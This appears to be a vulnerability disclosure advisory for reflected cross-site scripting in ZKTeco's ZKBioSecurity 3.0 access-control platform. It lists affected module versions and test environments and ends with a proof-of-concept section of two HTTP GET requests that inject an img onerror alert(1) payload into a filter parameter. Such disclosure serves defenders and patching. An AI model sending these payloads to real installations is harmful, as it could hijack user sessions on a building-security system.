### Summary
ZKBioSecurity3.0 is the ultimate "All in One" web based security platform developed by ZKTeco. It contains four integrated modules: access control, video linkage, elevator control and visitor management. With an optimized system architecture designed for high level biometric identification and a modern-user friendly UI, ZKBioSecurity 3.0 provides the most advanced solution for a whole new user experience.
### Description
ZKBioSecurity suffers from multiple reflected XSS vulnerabilities when input passed via several parameters to several scripts is not properly sanitized before being returned to the user. This can be exploited to execute arbitrary HTML and script code in a user's browser session in context of an affected site.
### Vendor
ZKTeco Inc. - http://www.zkteco.com
### Affected Version
* 3.0.1.0_R_230
* Platform: 3.0.1.0_R_230
* Personnel: 1.0.1.0_R_1916
* Access: 6.0.1.0_R_1757
* Elevator: 2.0.1.0_R_777
* Visitor: 2.0.1.0_R_877
* Video:2.0.1.0_R_489
* Adms: 1.0.1.0_R_197
### Tested On
* Microsoft Windows 7 Ultimate SP1 (EN)
* Microsoft Windows 7 Professional SP1 (EN)
* Apache-Coyote/1.1
* Apache Tomcat/7.0.56
### PoC
```
GET /authRoleAction!getAll.action?packageName=auth&un=1468847752607_1814&systemCode=base&pager.posStart=0&pager.pageSize=50&xmlFileName=AuthGroup&filter:authGroupSet.id=1<img%20src%3da%20onerror%3dalert(1)> HTTP/1.1
GET /authUserAction!getAll.action?packageName=auth&un=1468847752607_1814&systemCode=base&pager.posStart=0&pager.pageSize=50&xmlFileName=AuthGroup&filter:authGroupSet.id=1<img%20src%3da%20onerror%3dalert(1)> HTTP/1.1
```
暂无评论